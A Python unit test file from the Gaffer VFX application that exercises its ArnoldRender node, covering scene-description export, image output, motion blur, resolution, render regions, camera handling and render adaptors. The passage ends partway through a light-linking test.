ArnoldRenderTest.py
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import six
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.SceneAlgo.deregisterRenderAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.assertFalse( p.returncode )
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addChild( Gaffer.NameValuePlug( "renderDirectory", self.temporaryDirectory() + "/renderTests" ) )
s["variables"].addChild( Gaffer.NameValuePlug( "assDirectory", self.temporaryDirectory() + "/assTests" ) )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = GafferDispatch.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
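# Helper that flattens an Arnold AtMatrix into an imath.M44f so matrices loaded from the .ass file can be compared with assertEqual.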
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), True )
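# The renderResolution and resolutionMultiplier options should be baked into Arnold's xres/yres globals.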
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
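# Crop window and overscan options should map to Arnold's region_min_*/region_max_* pixel bounds.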
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
if [ int( v ) for v in arnold.AiGetVersion()[:3] ] >= [ 7, 0, 0 ] :
with Gaffer.Context() as c :
for i in range( 0, 2 ) :
c.setFrame( i )
self.assertTrue( os.path.exists( c.substitute( render["fileName"].getValue() ) ) )
else :
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions( universe ), "AA_seed" ),
seed or round( frame )
)
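# The ${scene:renderer} context variable should expand to "Arnold" while the scene is generated for rendering.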
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( universe, "/sphereArnold" ) is not None )
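# Render adaptors registered via GafferScene.SceneAlgo.registerRenderAdaptor() should be applied automatically at render time.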
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.SceneAlgo.registerRenderAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( universe, "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
